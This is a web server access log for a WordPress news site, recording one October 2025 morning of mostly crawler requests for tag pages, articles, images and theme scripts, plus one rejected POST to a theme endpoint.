17.22.237.54 - - [19/Oct/2025:11:54:16 -0400] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 48249 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.245.44 - - [19/Oct/2025:11:54:17 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.7.1 HTTP/1.1" 200 160112 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.237.156 - - [19/Oct/2025:11:54:17 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdSmartSidebar.js?ver=12.7.1 HTTP/1.1" 200 9966 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.253.120 - - [19/Oct/2025:11:54:18 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 29694 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.245.204 - - [19/Oct/2025:11:54:18 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdToTop.js?ver=12.7.1 HTTP/1.1" 200 1426 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.135 - - [19/Oct/2025:11:54:18 -0400] "GET /tag/50-couples-performing-acro-yoga HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.241.75.78 - - [19/Oct/2025:11:54:19 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdPostImages.js?ver=12.7.1 HTTP/1.1" 200 2449 "http://wahgazab.com/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big-2/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.96 - - [19/Oct/2025:11:54:19 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdSocialSharing.js?ver=12.7.1 HTTP/1.1" 200 2632 "http://wahgazab.com/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big-2/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.135 - - [19/Oct/2025:11:54:19 -0400] "GET /tag/50-couples-performing-acro-yoga/ HTTP/1.1" 200 122022 "http://wahgazab.com/tag/50-couples-performing-acro-yoga" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:54:19 -0400] "GET /tag/couples-performing-acro-yoga HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.241.227.34 - - [19/Oct/2025:11:54:20 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdModalPostImages.js?ver=12.7.1 HTTP/1.1" 200 8892 "http://wahgazab.com/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big-2/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.135 - - [19/Oct/2025:11:54:20 -0400] "GET /tag/couples-performing-acro-yoga/ HTTP/1.1" 200 121998 "http://wahgazab.com/tag/couples-performing-acro-yoga" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:54:20 -0400] "GET /tag/acro-yoga HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.22.253.21 - - [19/Oct/2025:11:54:20 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoginMobile.js?ver=12.7.1 HTTP/1.1" 200 6347 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.135 - - [19/Oct/2025:11:54:21 -0400] "GET /tag/acro-yoga/ HTTP/1.1" 200 121846 "http://wahgazab.com/tag/acro-yoga" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.241.227.223 - - [19/Oct/2025:11:54:21 -0400] "GET /wp-includes/js/comment-reply.min.js?ver=6.8.3 HTTP/1.1" 200 3026 "http://wahgazab.com/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big/this-man-quits-his-job-from-google-now-making-samosa-and-earning-so-big-2/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.237.239 - - [19/Oct/2025:11:54:21 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbSearch.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 5945 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.245.129 - - [19/Oct/2025:11:54:22 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/tdbMenu.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 10781 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.253.197 - - [19/Oct/2025:11:54:22 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdMenu.js?ver=12.7.1 HTTP/1.1" 200 4530 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.253.197 - - [19/Oct/2025:11:54:23 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.3 HTTP/1.1" 200 19251 "http://wahgazab.com/tag/david-andrew-jeffers/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.244.66.247 - - [19/Oct/2025:11:54:30 -0400] "GET /mysterious-things-found-deep-down-the-sea/ HTTP/1.1" 200 280730 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.249.79.168 - - [19/Oct/2025:11:54:59 -0400] "GET /?a=79045102764706&channel=906afc&from=shared.php%3Fid%3D1027647-2066%26name%3D%E3%80%90%E6%96%B0%E5%93%81L%E3%80%91PING+%E6%8C%81%E7%B6%9A%E6%80%A7%E5%86%B7%E6%84%9F+%E5%8D%8A%E8%A2%96%E3%83%9D%E3%83%AD%E3%82%B7%E3%83%A3%E3%83%84+%E3%83%AC%E3%83%87%E3%82%A3%E3%82%B9%E3%80%802023%E5%B9%B4%E3%83%A2%E3%83%87%E3%83%AB HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.75.236.158 - - [19/Oct/2025:11:55:09 -0400] "GET /girl-raped-43200-times-get-to-know-her/feed/ HTTP/1.1" 200 901 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.22.237.7 - - [19/Oct/2025:11:55:19 -0400] "GET /wp-content/uploads/2018/10/img_02_2018_10-1.jpg HTTP/1.1" 200 28210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.244.66.247 - - [19/Oct/2025:11:55:27 -0400] "GET /this-app-recognizes-original-and-duplicate-things-easily/ HTTP/1.1" 200 283689 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
17.246.15.236 - - [19/Oct/2025:11:55:42 -0400] "GET /wp-content/uploads/2017/10/a-planet-in-this-solar-system-to-remain-human-less2-150x150.jpg HTTP/1.1" 200 5469 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
69.63.184.9 - - [19/Oct/2025:11:55:45 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
89.248.172.183 - - [19/Oct/2025:11:57:01 -0400] "POST /wp-json/tdw/save_css HTTP/1.1" 401 98 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
216.73.216.135 - - [19/Oct/2025:11:57:01 -0400] "GET /tag/model-carol-gracias-baby-bump-was-the-showstopper-news HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:02 -0400] "GET /tag/model-carol-gracias-baby-bump-was-the-showstopper-news/ HTTP/1.1" 200 122561 "http://wahgazab.com/tag/model-carol-gracias-baby-bump-was-the-showstopper-news" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:02 -0400] "GET /tag/acro-yoga-poses HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:03 -0400] "GET /tag/acro-yoga-poses/ HTTP/1.1" 200 121894 "http://wahgazab.com/tag/acro-yoga-poses" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:03 -0400] "GET /tag/acro-yoga-poses-video HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:03 -0400] "GET /tag/acro-yoga-poses-video/ HTTP/1.1" 200 121942 "http://wahgazab.com/tag/acro-yoga-poses-video" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
54.37.118.81 - - [19/Oct/2025:11:57:17 -0400] "GET /tag/shiva-linga-found-in-africa/ HTTP/1.1" 200 121906 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.135 - - [19/Oct/2025:11:57:48 -0400] "GET /tag/acro-yoga-news HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:48 -0400] "GET /tag/acro-yoga-news/ HTTP/1.1" 200 121886 "http://wahgazab.com/tag/acro-yoga-news" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:48 -0400] "GET /tag/acro-yoga-poses-news HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:49 -0400] "GET /tag/acro-yoga-poses-news/ HTTP/1.1" 200 121934 "http://wahgazab.com/tag/acro-yoga-poses-news" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:49 -0400] "GET /tag/50-couples-acro-yoga HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:11:57:50 -0400] "GET /tag/50-couples-acro-yoga/ HTTP/1.1" 200 121934 "http://wahgazab.com/tag/50-couples-acro-yoga" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
17.22.245.43 - - [19/Oct/2025:11:58:13 -0400] "GET /wp-content/uploads/2017/06/Golgappa-vendor-gets-elated-for-not-being-called-bhaiya-from-a-girl-3-150x150.jpg HTTP/1.1" 200 5360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.79.169 - - [19/Oct/2025:11:58:39 -0400] "GET /beautiful-watches-made-up-of-cow-and-buffalo-dung/ HTTP/1.1" 200 281603 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.96.38.218 - - [19/Oct/2025:11:58:52 -0400] "GET /wp-content/uploads/2017/07/Mumtaz-waiting.jpg HTTP/1.1" 200 118986 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
57.141.0.7 - - [19/Oct/2025:11:59:09 -0400] "GET /tag/finally-here-is-the-answer-to-why-kattappa-killed-baahubali/ HTTP/1.1" 200 122436 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.243.229.221 - - [19/Oct/2025:11:59:40 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%90%E0%A4%B8%E0%A5%87-%E0%A4%AA%E0%A4%A4%E0%A4%BE-%E0%A4%B2%E0%A4%97%E0%A4%BE%E0%A4%8F%E0%A4%82-%E0%A4%87%E0%A4%B8-%E0%A4%B5%E0%A4%BE%E0%A4%AF%E0%A4%B0%E0%A4%B8-%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%BE%E0%A4%B0%E0%A5%87-%E0%A4%AE%E0%A5%87%E0%A4%82.jpg HTTP/1.1" 200 122625 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
17.246.15.134 - - [19/Oct/2025:11:59:43 -0400] "GET /wp-content/uploads/2017/11/visiting-this-country-costs-too-less-that-even-beggars-can-visit-cover-150x150.jpg HTTP/1.1" 200 6434 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
54.37.118.71 - - [19/Oct/2025:11:59:46 -0400] "GET /tag/hrithik-problems/ HTTP/1.1" 200 121729 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.4 - - [19/Oct/2025:11:59:53 -0400] "GET /muslim-man-adopts-cow-and-spreads-a-message-of-humanity/ HTTP/1.1" 200 284756 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.0.5 - - [19/Oct/2025:11:59:58 -0400] "GET /the-ingredients-present-in-johnson-powder-can-cause-cancer-to-infants/ HTTP/1.1" 200 288512 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.135 - - [19/Oct/2025:12:00:09 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:00:09 -0400] "GET /tag/50-couples-acro-yoga-news-in-hindi HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:00:10 -0400] "GET /tag/50-couples-acro-yoga-news-in-hindi/ HTTP/1.1" 200 122046 "http://wahgazab.com/tag/50-couples-acro-yoga-news-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:00:11 -0400] "GET /tag/50-couples-acro-yoga-news HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:00:11 -0400] "GET /tag/50-couples-acro-yoga-news/ HTTP/1.1" 200 121974 "http://wahgazab.com/tag/50-couples-acro-yoga-news" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
57.141.0.50 - - [19/Oct/2025:12:00:20 -0400] "GET /muslim-people-have-offerings-here-at-this-pataleshwar-shiva-mandir/ HTTP/1.1" 200 286163 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.0.24 - - [19/Oct/2025:12:00:36 -0400] "GET /15-year-old-boy-explores-ages-old-city/ HTTP/1.1" 200 282386 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
168.158.143.86 - - [19/Oct/2025:12:00:46 -0400] "GET /wp-content/uploads/2015/11/price-hike2.jpg HTTP/1.1" 404 136514 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
161.77.160.118 - - [19/Oct/2025:12:00:50 -0400] "GET /wp-content/uploads/2015/11/price-hike2.jpg HTTP/1.1" 404 136514 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
92.112.18.8 - - [19/Oct/2025:12:00:56 -0400] "GET /wp-content/uploads/2015/11/price-hike2.jpg HTTP/1.1" 404 136514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
216.73.216.135 - - [19/Oct/2025:12:01:01 -0400] "GET /tag/somalia HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:01:02 -0400] "GET /tag/somalia/ HTTP/1.1" 200 121549 "http://wahgazab.com/tag/somalia" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:01:03 -0400] "GET /tag/israeli-acro-community HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:01:03 -0400] "GET /tag/50-couples HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:01:03 -0400] "GET /tag/50-couples/ HTTP/1.1" 200 121854 "http://wahgazab.com/tag/50-couples" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.135 - - [19/Oct/2025:12:01:03 -0400] "GET /tag/israeli-acro-community/ HTTP/1.1" 200 121950 "http://wahgazab.com/tag/israeli-acro-community" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
173.252.87.25 - - [19/Oct/2025:12:01:07 -0400] "GET /robots.txt HTTP/1.1" 200 112 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
17.246.23.193 - - [19/Oct/2025:12:01:33 -0400] "GET /paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/ HTTP/1.1" 200 122873 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
182.44.12.37 - - [19/Oct/2025:12:01:42 -0400] "GET / HTTP/1.1" 200 200962 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
92.222.108.111 - - [19/Oct/2025:12:02:05 -0400] "GET /tag/siva-linga-at-gregorian-etruscan-museum/ HTTP/1.1" 200 122002 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.246.23.189 - - [19/Oct/2025:12:02:30 -0400] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 48249 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.93 - - [19/Oct/2025:12:02:31 -0400] "GET /wp-content/themes/Newspaper/style.css?ver=12.7.1 HTTP/1.1" 200 158737 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.50 - - [19/Oct/2025:12:02:31 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=492e3cf54bd42df3b24a3de8e2307cafx HTTP/1.1" 200 173151 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.250 - - [19/Oct/2025:12:02:32 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 13577 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.227 - - [19/Oct/2025:12:02:32 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 87553 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.68 - - [19/Oct/2025:12:02:33 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.7.1 HTTP/1.1" 200 160112 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.189 - - [19/Oct/2025:12:02:33 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdPostImages.js?ver=12.7.1 HTTP/1.1" 200 2449 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.181 - - [19/Oct/2025:12:02:33 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdSmartSidebar.js?ver=12.7.1 HTTP/1.1" 200 9966 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.250 - - [19/Oct/2025:12:02:34 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdSocialSharing.js?ver=12.7.1 HTTP/1.1" 200 2632 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.50 - - [19/Oct/2025:12:02:34 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdModalPostImages.js?ver=12.7.1 HTTP/1.1" 200 8892 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.227 - - [19/Oct/2025:12:02:35 -0400] "GET /wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=d578089f160957352b9b4ca6d880fd8f HTTP/1.1" 200 29694 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.189 - - [19/Oct/2025:12:02:35 -0400] "GET /wp-content/plugins/td-composer/legacy/Newspaper/js/tdToTop.js?ver=12.7.1 HTTP/1.1" 200 1426 "http://wahgazab.com/paramjeet-singh-pamma-known-as-the-angriest-person-in-india/paramjeet-singh-pamma-known-as-the-angriest-person-in-india-cover/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
